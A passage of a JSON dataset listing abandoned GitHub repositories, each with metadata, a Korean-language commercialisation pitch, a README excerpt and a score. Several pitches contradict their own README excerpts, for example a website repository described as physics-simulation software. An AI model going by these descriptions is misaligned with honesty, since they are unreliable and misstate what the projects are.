매력적입니다.\n\n## 어디에 쓸 수 있나\n1. **프라이빗 검색 서비스**: 기업의 민감한 정보를 외부 검색 엔진 추적 없이 내부에서만 검색하는","readme_excerpt":"","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"OpnTec/mbdyn-gci","github_url":"https://github.com/OpnTec/mbdyn-gci","stars":12,"language":"Less","license":"unknown","abandonment_months":31,"description":"# OpnTec/mbdyn-gci 분석 보고서\n\n## 왜 보물인가\n복잡한 물리 현상을 컴퓨터로 계산하고 시뮬레이션하는 전문 도구로, 항공우주·자동차·건설 같은 고부가가치 산업에서 매우 필요로 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 엔지니어 대상 웹 기반 시뮬레이션 플랫폼 구축 (설계 도면 업로드 → 자동 계산 → 결과 분석 리포","readme_excerpt":"# opentechsummit.de\nWebsite of OpenTechSummit 2020\nhttps://opentechsummit.de\n","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"yangchaojiang/DemoLoadView","github_url":"https://github.com/yangchaojiang/DemoLoadView","stars":5,"language":"Java","license":"unknown","abandonment_months":95,"description":"# DemoLoadView 분석 보고서\n\n## 왜 보물인가\n앱이나 웹사이트의 로딩 화면을 쉽게 만들 수 있는 도구로, 사용자 경험을 개선하는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 대시보드나 클라우드 협업 도구에서 데이터 로딩 중 사용자를 안심시키는 로딩 화면 제공\n2. **내부 업무 도구**: 대기업의 ER","readme_excerpt":"# LoadViewHelper\n\n\n\n#切换加载中，加载失败，加载成功布局，支持全局和局部之自定义布局 定义一个LoadViewHelper所有界面通用，无需添加布局中view, 大大降低耦合性。\n\n## LoadViewHelper\n通过Gradle抓取:\n\n```gradle\ncompile 'com.ycjiang:loadviewhelper:1.1.2'\n\n```\n \n\n\n![](images/sss.gif)\n\n### 在你Framgment 或者ACtivity\n\n```\n    LoadViewHelper helper = new LoadViewHelper(listView);  \n\t    //将listview切换成显示加载中布局\n\n\t\thelper.showLoading(\"加载中...\");\n\n\t\t//将listview切换成显示空数据布局\n\t\thelper.showEmpty(\"暂无数据\", \"重试\");\n\t\t//或者\n\t\thelper.showEmpty();\n\t//\t监听重试按钮\n\t\t  helper.setListener(new OnLoadViewListener() {\n                    @Override\n                    public void onRetryClick() {\n                        Toast.makeText(getApplicationContext(), \"点击了重试\", Toast.LENGTH_SHORT).show();\n                    }\n      });\n```\n\n## 可以 自定义 加载中，加载失败，加载为空 布局 实现自己加载效果\n###  使用全部自定义布局\n```\npublic class App extends Application {\n\n    @Override\n    public void onCreate() {\n        super.onCreate();\n            LoadViewHelper.getBuilder()\n                .setLoadEmpty(R.layout.this_empty)\n            ","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"graviton57/DynamicAnimationExample","github_url":"https://github.com/graviton57/DynamicAnimationExample","stars":8,"language":"Java","license":"unknown","abandonment_months":109,"description":"# DynamicAnimationExample 분석\n\n## 왜 보물인가\n앱이나 웹사이트에서 부드럽고 자연스러운 움직임 효과를 쉽게 만들 수 있는 기술로, 사용자 경험을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 노코드 애니메이션 빌더 플랫폼으로, 기술 없는 마케터도 광고용 동영상을 직접 만들 수 있게 제공\n2. **내부 ","readme_excerpt":"# Dynamic Animation Example\n\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Dynamic%20Animation%20Example-brightgreen.svg?style=flat)](https://android-arsenal.com/details/3/5635)\n[![License](https://img.shields.io/badge/license-Apache%202-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0)\n[![API](https://img.shields.io/badge/API-16%2B-green.svg?style=flat)](https://android-arsenal.com/api?level=16)\n\n### \n[Dynamic-animation](https://developer.android.com/reference/android/support/animation/package-summary.html) is a new module introduced in [revision 25.3.0 of the Android Support Library](https://developer.android.com/topic/libraries/support-library/revisions.html#25-3-0). It provides a small set of classes for making realistic physics-based view animations.\n\n\n### Setup\nTo get started, add the following dependency to your module’s build.gradle:\n\n```gradle \ndependencies {\n    compile 'com.android.support:support-dynamic-animation:25.3.0'\n}\n```\n**support-dynamic-a","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"cute-jumper/gscholar-bibtex","github_url":"https://github.com/cute-jumper/gscholar-bibtex","stars":7,"language":"Emacs Lisp","license":"unknown","abandonment_months":58,"description":"# gscholar-bibtex 상용화 분석\n\n## 왜 보물인가\n학술 논문을 자동으로 인용 형식으로 변환해주는 도구로, 논문을 많이 읽는 학생과 연구자들의 번거로운 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 학술 논문 관리 플랫폼 - 논문 자료를 모으고 자동으로 참고문헌을 정렬해주는 구독형 웹 서비스\n2. **내부 ","readme_excerpt":"* gscholar bibtex\n  [[http://melpa.org/#/gscholar-bibtex][file:http://melpa.org/packages/gscholar-bibtex-badge.svg]]\n  [[http://stable.melpa.org/#/gscholar-bibtex][file:http://stable.melpa.org/packages/gscholar-bibtex-badge.svg]]\n\n  Retrieve BibTeX entries from Google Scholar, ACM Digital Library, IEEE Xplore\n  and DBLP by your query. All in Emacs Lisp!\n\n  *UPDATE*: ACM Digital Library, IEEE Xplore, and DBLP are now supported though\n  the package name doesn't suggest that.\n** Basic usage\n   Without =package.el=:\n  : (add-to-list 'load-path \"/path/to/gscholar-bibtex.el\")\n  : (require 'gscholar-bibtex)\n\n   With =package.el=: install via melpa!\n\n   To use, simply call\n  : M-x gscholar-bibtex\n\n  Choose a source, then enter your query and select the results.\n\n  Available commands in `gscholar-bibtex-mode', /i.e./, in the window of search\n  results:\n  - n/p: next/previous\n  - TAB: show BibTeX entry for current search result\n  - A/W: append/write to `gscholar-bibtex-database-file' (see later)","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"shevajia/TaiwanReferendum","github_url":"https://github.com/shevajia/TaiwanReferendum","stars":15,"language":"Jupyter Notebook","license":"unknown","abandonment_months":91,"description":"# TaiwanReferendum 저장소 분석\n\n## 왜 보물인가\n대만의 국민투표 데이터를 체계적으로 정리한 공개 자료로, 정치 분석가나 언론사가 신뢰할 수 있는 근거 자료로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **정치 분석 SaaS**: 선거 데이터를 시각화하고 추세를 분석해주는 웹 서비스로 정당이나 싱크탱크에 판매\n2. **언론사 내부","readme_excerpt":"# 簡述\r\n\r\n\r\n剛剛看到yutin1987上傳的2018台灣公投的[所有開票所的結果](https://github.com/g0v/referendum_report/tree/master/results2)，出於對資料的手癢，就立即下載下來跑了分析。不跑不知道，一跑嚇一跳。通過初步的描述分析就可以發現，中選會公佈的有些開票所的結果出現了明顯不合理的數據！\r\n\r\n廢話不多說，直接上結果。\r\n\r\n首先，這是所有公投案之間的散點圖。可以看到，與鄉鎮層級的結果不同的是，在每張圖上，垂直和水平方向都出現了不少的觀測值，這是不合常理的。\r\n\r\n<img src=\"scatter.png\">\r\n\r\n我們隨便看看其中的一張。\r\n<img src=\"scatter_1.png\">\r\n\r\n我一開始以為是極端值特有的屬性，但是看到下面這張圖，就發現有些開票結果是明顯有問題的。這是第14案vs第15案的散點圖。我們知道這兩案都是平權方提出的，兩案的開票結果應該是高度正相關的。在絕大多數的開票所，結果也確實是高度正相關。但是，散點圖也顯示，有不少的奇怪的觀測值出現在圖的正上方和正右方。若仔細看這些極端值的話，他們在兩個公投案的結果上是負相關的！\r\n\r\n<img src=\"scatter_2.png\">\r\n\r\n畫上兩條線後，一目了然！兩條斜度是1和-1的斜線可以完美地貫穿所有的觀測值。+1斜線附近的觀測值是正常的。-1斜線附近的觀測值是不正常的，在這些開票所，有一案的公投結果應該是報反了！\r\n\r\n<img src=\"scatter_3.png\">\r\n\r\n我們可以直接在中選會的網站上找到這些開票所的結果。例如，以南投縣中寮鄉0373開票所為例。下面是兩案結果的鏈接：\r\n\r\nhttp://referendum.2018.nat.gov.tw/pc/zh_TW/08/10008000800000373.html\r\n\r\nhttp://referendum.2018.nat.gov.tw/pc/zh_TW/09/10008000800000373.html\r\n\r\n我們可以看到，14案和15案的結果是相反的。隨便再舉一例：高雄市三民區0943開票所。\r\n\r\nhttp://referendum.2018.nat.gov.tw/pc/zh_TW/08/64000000500000943.html\r\n","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"xulayen/es6tutorial","github_url":"https://github.com/xulayen/es6tutorial","stars":7,"language":"JavaScript","license":"NOASSERTION","abandonment_months":104,"description":"# ES6 튜토리얼 저장소 분석\n\n## 왜 보물인가\n최신 웹 개발 언어인 자바스크립트의 핵심 문법을 배우는 교육 자료로, 프로그래머들이 현대적인 웹사이트를 만드는 데 필요한 기초를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **프로그래밍 학습 플랫폼(SaaS)**: 온라인 코딩 교육 서비스에서 유료 과정으로 판매\n2. **기업 직원 교육 도구**: IT ","readme_excerpt":"# ECMAScript 6 入门\n\n《ECMAScript 6 入门》是一本开源的 JavaScript 语言教程，全面介绍 ECMAScript 6 新引入的语法特性。\n\n[![cover](images/cover_thumbnail_3rd.jpg)](images/cover-3rd.jpg)\n\n本书覆盖 ES6 与上一个版本 ES5 的所有不同之处，对涉及的语法知识给予详细介绍，并给出大量简洁易懂的示例代码。\n\n本书为中级难度，适合已经掌握 ES5 的读者，用来了解这门语言的最新发展；也可当作参考手册，查寻新增的语法点。\n\n全书已由电子工业出版社出版，2017年9月推出了第三版，书名为《ES6 标准入门》。纸版是基于网站内容排版印刷的。\n\n感谢张春雨编辑支持我将全书开源的做法。如果您认可这本书，建议购买纸版。这样可以使出版社不因出版开源书籍而亏钱，进而鼓励更多的作者开源自己的书籍。下面是第三版的购买地址。\n\n- [淘宝](https://s.taobao.com/search?q=ES6%E6%A0%87%E5%87%86%E5%85%A5%E9%97%A8+%E7%AC%AC3%E7%89%88)\n- [京东](https://search.jd.com/Search?keyword=ES6%E6%A0%87%E5%87%86%E5%85%A5%E9%97%A8%20%E7%AC%AC3%E7%89%88&enc=utf-8&wq=ES6%E6%A0%87%E5%87%86%E5%85%A5%E9%97%A8%20%E7%AC%AC3%E7%89%88)\n- [当当](http://product.dangdang.com/25156888.html)\n- [亚马逊](https://www.amazon.cn/ES6%E6%A0%87%E5%87%86%E5%85%A5%E9%97%A8-%E9%98%AE%E4%B8%80%E5%B3%B0/dp/B0755547ZZ)\n- [China-pub](http://product.china-pub.com/6504650)\n\n### 版权许可\n\n本书采用“保持署名—非商用”创意共享4.0许可证。\n\n只要保持原作者署名和非商用，您可以自由地阅读、分享、修改本书。\n\n详细的法律条文请参见[创意共享](h","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"xulayen/react-intl","github_url":"https://github.com/xulayen/react-intl","stars":7,"language":"JavaScript","license":"NOASSERTION","abandonment_months":104,"description":"# xulayen/react-intl 분석 보고서\n\n## 왜 보물인가\n웹사이트를 여러 나라 언어로 자동 변환해주는 기술로, 글로벌 서비스 확장에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 한국 스타트업이 미국·일본·유럽으로 서비스를 확장할 때 다국어 지원 기능 제공\n2. **내부 업무 도구**: 다국적 기업의 직원들이 각","readme_excerpt":"React Intl\n==========\n\nInternationalize [React][] apps. This library provides React components and an API to format dates, numbers, and strings, including pluralization and handling translations.\n\n[![npm Version][npm-badge]][npm]\n[![Build Status][travis-badge]][travis]\n[![Dependency Status][david-badge]][david]\n\nOverview\n--------\n\n**React Intl is part of [FormatJS][].** It provides bindings to React via its components and API.\n\n### [Documentation][]\n\nReact Intl's docs are in this GitHub repo's [Wiki][Documentation], [__Get Started__][Getting Started]. There are also several [runnable example apps][Examples] which you can reference to learn how all the pieces fit together.\n\n_(If you're looking for React Intl v1, you can find it [here][v1-docs].)_\n\n### Features\n\n- Display numbers with separators.\n- Display dates and times correctly.\n- Display dates relative to \"now\".\n- Pluralize labels in strings.\n- Support for 150+ languages.\n- Runs in the browser and Node.js.\n- Built on standards.\n\n###","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"xulayen/webpack-for-react","github_url":"https://github.com/xulayen/webpack-for-react","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":102,"description":"# xulayen/webpack-for-react 분석\n\n## 왜 보물인가\n웹사이트를 더 빠르고 가볍게 만들어주는 React 개발 도구 설정 모음으로, 웹 개발자들의 반복적인 설정 작업을 크게 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 설정을 클라우드에서 제공하는 웹 개발 IDE 플랫폼 구축\n2. **내부 업무 도구*","readme_excerpt":"﻿## 安装\n\n``` bash\nnpm i\n```\n\n## 开发\n\n``` bash\nnpm run start\n```\n\n## 打包\n\n``` bash\nnpm run build\n```\n\n## 启动后端服务\n\n``` bash\nnpm run server\n```\n\n## 打包之后访问\n\nhttp://127.0.0.1:8011/","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"loklak/dev.loklak.org","github_url":"https://github.com/loklak/dev.loklak.org","stars":12,"language":"HTML","license":"unknown","abandonment_months":49,"description":"# loklak/dev.loklak.org 분석 보고서\n\n## 왜 보물인가\n소셜 미디어 데이터를 수집·분석할 수 있는 오픈소스 플랫폼으로, 마케팅이나 여론 분석이 필요한 기업들에게 값비싼 외부 서비스 대신 직접 구축할 수 있는 대안을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 소셜 미디어 모니터링 SaaS**\n- 기업 고객을 위해 브랜드 평판, 경쟁","readme_excerpt":"# dev.loklak.org\n\nThis repository aggregates separated rendered HTML pages from various Loklak\nprojects.\n\nPlease **do not** submit issues or pull requests to this repository. Due to\nthe fact it's automated and only contains rendered HTML pages.\n\nAggregation is achieved with `git subtree` which is used over submodules for\nstability reasons.\n","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"sqreen/funAPM","github_url":"https://github.com/sqreen/funAPM","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":39,"description":"# funAPM 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션의 성능을 자동으로 측정하고 문제를 빠르게 찾아주는 도구로, 서비스가 느려지는 원인을 쉽게 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사의 웹 애플리케이션 성능을 모니터링해주는 클라우드 기반 구독 서비스로 제공\n2. **내부 업무 도구**: 은행·증권사 같","readme_excerpt":"# funAPM\n\nTo run this project, you will need to have MongoDB available on your computer then:\n\n* clone this repository\n* `npm install` in this repository and in the testApp directory\n* start the test application with `node testApp/server.js`\n\nYou can then interact with this application with the following curl commands\n\n```\ncurl -H \"Content-Type: application/json\" -X POST -d '{\"name\":\"xyz\"}' http://localhost:9090/cats\n```\n\n```\ncurl http://localhost:9090/cats\n```\n\n```\ncurl http://localhost:9090/destroyrandom\n```\n\nAfter the server is stopped, a file name `viewer.html` is created to display the results that can be found in `apm_logs.json`\n\n","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"fossasia/wp-ai-twitter-feeds","github_url":"https://github.com/fossasia/wp-ai-twitter-feeds","stars":10,"language":"HTML","license":"unknown","abandonment_months":63,"description":"# fossasia/wp-ai-twitter-feeds 사업화 분석\n\n## 왜 보물인가\n인공지능을 활용해 트위터 콘텐츠를 자동으로 수집하고 정리해주는 도구로, 마케팅 담당자들의 반복적인 SNS 모니터링 업무를 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 기업 마케팅팀을 위한 '트위터 자동 콘텐츠 수집 플랫폼' -","readme_excerpt":"Site for the annual FOSSASIA Summit \n\nMarch 19-22, 2020 at Lifelong Learning Institute, Singapore\n\nhttps://summit.fossasia.org\n","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"fossasia/feed.api.fossasia.net","github_url":"https://github.com/fossasia/feed.api.fossasia.net","stars":11,"language":"PHP","license":"unknown","abandonment_months":54,"description":"# fossasia/feed.api.fossasia.net 분석\n\n## 왜 보물인가\n여러 소식 출처를 한곳에서 모아볼 수 있는 뉴스 수집 시스템으로, 정보를 효율적으로 관리하려는 조직과 개인에게 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스 큐레이션 서비스**: 다양한 분야의 소식을 자동으로 모아 사용자에게 제공하는 구독형 뉴스 플랫폼\n2. **기업","readme_excerpt":"FOSSASIA Feed Merger\n===========\nRSS blog feed merger for FOSSASIA API communities\n\n[![Join the chat at https://gitter.im/fossasia/api.fossasia.net](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/api.fossasia.net?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n## Setup\n\n* Clone the repo :\n\n\t```sh\n\tgit clone https://github.com/fossasia/feed.api.fossasia.net.git\n\tcd feed.api.fossasia.net\n\t```\n\n* Create `config.json` from `config.json.sample`, and modify it as you need.\n\n\t```sh\n\tcp config.json.sample config.json\n\t```\n\n* Create a `cache` folder to store cached feeds\n\n* Run `feed.php` (or access it from a php web server)\n\n\t```sh\n\tphp feed.php\n\t```\n\n## How to use\n\nFrom a web browser or a terminal, call `feed.php`, with these parameters : \n\n* `source` : shortname of the community to get feeds from. Set `source` to `all` to get feeds from all communities.\n\n You can find a community shortname here (keys) : https://github.com/fossasia/directory.","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"yacy/yacy_webclient_yaml4","github_url":"https://github.com/yacy/yacy_webclient_yaml4","stars":11,"language":"CSS","license":"NOASSERTION","abandonment_months":52,"description":"# yacy/yacy_webclient_yaml4 분석 보고서\n\n## 왜 보물인가\n검색 엔진을 직접 만들고 관리할 수 있는 오픈소스 도구로, 구글처럼 동작하는 개인 또는 기업용 검색 시스템을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. 기업 인트라넷 검색 서비스**: 회사 내부 문서와 웹사이트만 검색하는 비공개 검색 엔진을 SaaS로 제공\n**","readme_excerpt":"<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\n<head>\n<meta http-equiv=\"REFRESH\" content=\"1;URL=yacysearch/index.html\">\n</head>\n<body>\n<script type=\"text/javascript\">window.location= \"yacysearch/usage.html\";</script>\n</body>\n</html>\n","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"fossasia/codeheat-artwork","github_url":"https://github.com/fossasia/codeheat-artwork","stars":12,"language":"Less","license":"unknown","abandonment_months":62,"description":"# CodeHeat Artwork 저장소 분석\n\n## 왜 보물인가\n오픈소스 프로젝트의 디자인 자산을 체계적으로 정리한 저장소로, 시각 자료가 필요한 스타트업이나 커뮤니티가 무료로 활용할 수 있는 디자인 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n1. **디자인 SaaS**: 오픈소스 프로젝트를 위한 배너, 로고, 아이콘 자동 생성 서비스\n2. **커뮤니티","readme_excerpt":"# UNESCO Techcul\n\nhttps://techcul.org\n","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"fossasia/OpenDesign-Exhibition","github_url":"https://github.com/fossasia/OpenDesign-Exhibition","stars":12,"language":"CSS","license":"unknown","abandonment_months":76,"description":"# OpenDesign-Exhibition 평가 보고서\n\n## 왜 보물인가\n오픈소스 기반으로 디자인 전시회나 포트폴리오를 온라인에서 쉽게 구성하고 공유할 수 있는 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 디자이너와 아티스트를 위한 온라인 포트폴리오 호스팅 플랫폼 (Behance, Dribbble 경쟁)\n2. **내부 업무 도구","readme_excerpt":"# Codeheat.org website\n\nIn the heat of the code is a coding contest run by FOSSASIA, friends and partners.\n\nOfficial website: http://codeheat.org\n\nDevelopment Workflow:->\n\nFixing issues\n\nStep 1: Pick an issue to fix\n\nAfter selecting the issue\n\n1.Comment on the issue saying you are working on the issue.\n\n2.We expect you to discuss the approach either by commenting or in the gitter.\n\n3.Updates or progress on the issue would be nice.\n\nStep 2: Coding Policy\n\nPlease help us follow the best practice to make it easy for the reviewer as well as the contributor. We want to focus on the code quality more than on managing pull request ethics.\nSingle commit per pull request\nFor writing commit messages please adhere to the Commit style guidelines.\nFollow uniform design practices. The design language must be consistent throughout the app.\nThe pull request will not get merged until and unless the commits are squashed. In case there are multiple commits on the PR, the commit author needs to squash the","composite_score":0.3006,"license_safety_tag":"unknown"},{"name":"lengseling/DesignPattern","github_url":"https://github.com/lengseling/DesignPattern","stars":7,"language":"C#","license":"unknown","abandonment_months":106,"description":"# DesignPattern 저장소 분석\n\n## 왜 보물인가\n소프트웨어를 설계할 때 반복되는 문제들을 해결하는 검증된 해법 모음으로, 누구나 더 나은 프로그램을 만드는 데 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 기업의 개발팀이 소프트웨어 개발 시 이 패턴들을 참고하여 더 체계적인 구조로 프로그램 구축\n- **개발자 교육 플랫","readme_excerpt":"","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"awslabs/serverless-application-model","github_url":"https://github.com/awslabs/serverless-application-model","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# AWS Serverless Application Model (SAM) 분석\n\n## 왜 보물인가\n서버 관리 없이 인터넷 서비스를 만들 수 있도록 돕는 AWS의 공식 개발 도구로, 기업들이 복잡한 인프라 설정 없이 빠르게 서비스를 구축하고 배포할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 초기 스타트업이 빠르게 웹 서비","readme_excerpt":"# AWS SAM transform\n\n[![Tests](https://github.com/aws/serverless-application-model/actions/workflows/build.yml/badge.svg)](https://github.com/aws/serverless-application-model/actions/workflows/build.yml)\n[![Update schema](https://github.com/aws/serverless-application-model/actions/workflows/schema.yml/badge.svg)](https://github.com/aws/serverless-application-model/actions/workflows/schema.yml)\n[![PyPI](https://img.shields.io/pypi/v/aws-sam-translator?label=PyPI)](https://pypi.org/project/aws-sam-translator/)\n[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/aws-sam-translator?label=Python)](https://pypi.org/project/aws-sam-translator/)\n[![Contribute with Gitpod](https://img.shields.io/badge/Contribute%20with-Gitpod-908a85?logo=gitpod)](https://gitpod.io/#https://github.com/aws/serverless-application-model.git)\n\nThe [AWS Serverless Application Model](https://aws.amazon.com/serverless/sam/) (AWS SAM) transform is a [AWS CloudFormation macro](https://docs.aws.amazon.com/AWS","composite_score":0.3005,"license_safety_tag":"safe"},{"name":"grillitype/web-fonts-guide","github_url":"https://github.com/grillitype/web-fonts-guide","stars":6,"language":"","license":"unknown","abandonment_months":68,"description":"# grillitype/web-fonts-guide 평가\n\n## 왜 보물인가\n웹사이트에 사용되는 글꼴을 쉽게 찾고 올바르게 적용하는 방법을 정리한 실용적인 가이드로, 웹 제작자들의 반복적인 시행착오를 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 빌더 SaaS**: 초보자도 전문가 수준의 글꼴을 선택하도록 돕는 추천 기능\n2. **디자인 ","readme_excerpt":"# Using (Grilli Type) web fonts\n\n**Please note that the most up-to-date version of this guide is currently on Grilli Type’s blog: https://www.grillitype.com/blog/guides/using-grilli-type-web-fonts-guide. We will aim to update this version here at some point, as well.**\n\nLuckily it’s now really easy to use custom fonts in websites. The basics are easy to master, and this document hopes to help with that. It also links to further, more in-depth sources that are helpful for more advanced developers aiming to perfect aspects like the specific loading of the font files.\n\nIf you don’t know us, make sure to [have a look at the fonts](https://grillitype.com) on our website.\n\n**This document is a continuing work in progress, please let us know if anything is unclear – or if you think anything is wrong. Thank you!**\n\n## Table of contents\n\n* [Web font formats](#web-font-formats)\n* [How to embed web fonts in HTML/CSS](#how-to-embed-web-fonts-in-csshtml)\n\t* [CSS for all formats](#css-for-all-format","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"dailuobo-code/fulfillment-center","github_url":"https://github.com/dailuobo-code/fulfillment-center","stars":9,"language":"Java","license":"unknown","abandonment_months":45,"description":"","readme_excerpt":"# 做人不能做刘峰！！！！李阳还我血汗钱！！！\n","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"fossasia/tofsims","github_url":"https://github.com/fossasia/tofsims","stars":12,"language":"R","license":"unknown","abandonment_months":103,"description":"# fossasia/tofsims 프로젝트 분석\n\n## 왜 보물인가\n질량분석법(과학 실험 데이터 분석)을 자동화하는 오픈소스 도구로, 비싼 전문 소프트웨어를 대체할 수 있는 대안입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대학교·연구소가 구독하는 클라우드 기반 분석 플랫폼 (월 사용료 모델)\n2. **내부 업무 도구**: 화학·제약회사","readme_excerpt":"","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"fossasia/wp-tweets-widget","github_url":"https://github.com/fossasia/wp-tweets-widget","stars":11,"language":"PHP","license":"unknown","abandonment_months":119,"description":"# fossasia/wp-tweets-widget 분석\n\n## 왜 보물인가\n트위터 게시물을 웹사이트에 자동으로 표시해주는 도구로, 소셜 미디어 콘텐츠를 별도 작업 없이 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 워드프레스 사용자를 위한 트위터 피드 자동화 플러그인 구독 서비스\n2. **내부 업무 도구**: 회사 트위터 계","readme_excerpt":"# Tweets Wordpress Widget\n\nGitified version of the Tweets Widget published in the official Wordpress plugin directory:  \n[http://wordpress.org/plugins/tweets-widget/](http://wordpress.org/plugins/tweets-widget/)\n\nPlease report issues in the Wordpress plugin directory support forum:  \n[http://wordpress.org/support/plugin/tweets-widget](http://wordpress.org/support/plugin/tweets-widget)\n\n## Installation\n\nAdd the Loklak and Twitter APIs to this plugin via Git as follows:\n\n    $ git submodule add https://github.com/timwhitlock/wp-twitter-api.git api\n    $ git submodule add https://github.com/loklak/loklak_php_api.git loklak_php_api\n    \n\nFor further details on the plugin, please visit the [official plugin page](http://wordpress.org/plugins/tweets-widget/).\n","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"yacy/YaCyOAI","github_url":"https://github.com/yacy/YaCyOAI","stars":12,"language":"","license":"unknown","abandonment_months":195,"description":"# YaCyOAI 저장소 분석\n\n## 왜 보물인가\n13년 전에 개발된 검색 기술을 현대의 AI와 결합하면, 구글처럼 중앙화되지 않은 개인용 검색 엔진을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개인이 자신의 데이터만 검색하는 프라이빗 검색 엔진 구독 서비스\n- **내부 업무 도구**: 회사의 기밀 문서와 이메일만 검색하는 ","readme_excerpt":"* YaCyOAI - YaCy Open Archive Search \n* for PHP5 with cURL\n*\n* Copyright (c) 2010 yacy.net / dulcedo\n* URL: http://github.com/dulcedo/YaCyOAI\n\n* Permission is hereby granted, free of charge, to any person\n* obtaining a copy of this software and associated documentation\n* files (the \"Software\"), to deal in the Software without\n* restriction, including without limitation the rights to use,\n* copy, modify, merge, publish, distribute, sublicense, and/or sell\n* copies of the Software, and to permit persons to whom the\n* Software is furnished to do so, subject to the following\n* conditions:\n\n* The above copyright notice and this permission notice shall be\n* included in all copies or substantial portions of the Software.\n","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"fossasia/fossasia-nodemailer","github_url":"https://github.com/fossasia/fossasia-nodemailer","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":106,"description":"# fossasia/fossasia-nodemailer 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자에게 이메일을 자동으로 보내주는 기술로, 회원가입 확인, 비밀번호 재설정 등 필수 기능을 간편하게 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 협업 도구(Trello 같은)에서 팀원들에게 초대 이메일 자동 발송\n- ","readme_excerpt":"mailer\n======\nThis is a small node js server that can send emails using [nodemailer](https://www.npmjs.com/package/nodemailer).\n\n## Running\n\n`git clone https://github.com/fossasia/mailer.git`  \n`cd mailer`\n\nInstall dependancies.\n\n`npm install`\n\nVisit localhost:3100 on your browser.\n\nYou can actually make it send emails using your gmail account. However it might involve you clearing some security for your account. Proceed at your own risk.\n\ncopy the config files:\n\n`cp config.json.dist config.json`\n\nEdit config.json with your gmail username and password. Fire up the mail server again. Send emails!\n","composite_score":0.3005,"license_safety_tag":"unknown"},{"name":"meain/vim-printer","github_url":"https://github.com/meain/vim-printer","stars":5,"language":"Vim Script","license":"unknown","abandonment_months":28,"description":"# vim-printer 저장소 분석\n\n## 왜 보물인가\n텍스트 편집기에서 작성한 코드를 깔끔하게 인쇄할 수 있는 도구로, 프로그래머들이 종이에 코드를 출력할 때 필요한 간단하고 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 개발 도구(SaaS)**: 온라인 코드 편집기에 통합하여 사용자가 작성한 코드를 바로 인쇄할 수 있는 기능 추가","readme_excerpt":"# vim-printer\n\n![](https://i.imgur.com/9ptxO4c.gif)\n\nQuickly print/log the variable in your favourite language\n\n## Installation\n\nUse your favourite plugin manager to install. I use `vim-plug`.\n\n```\nPlug 'meain/vim-printer'\n```\n\n## Usage\n\nThere is two keybinding in each normal mode and visual mode.\nIn normal mode it works on current word under cursor and in visual mode it works on the visual selection.\n\n- `<leader>p` to add print/log statement below current line\n- `<leader>P` to add print/log statement above current line\n\n\n## Configuration\n\nYou can change the default keybindings like below.\nIt will be used both in normal mode and visual mode.\n\n```\nlet g:vim_printer_print_below_keybinding = '<leader>p'\nlet g:vim_printer_print_above_keybinding = '<leader>P'\n```\n\nYou can add new languages or override existing by using:\n\n> The text inside `{$}` will be replaced by the variable\n\n```\nlet 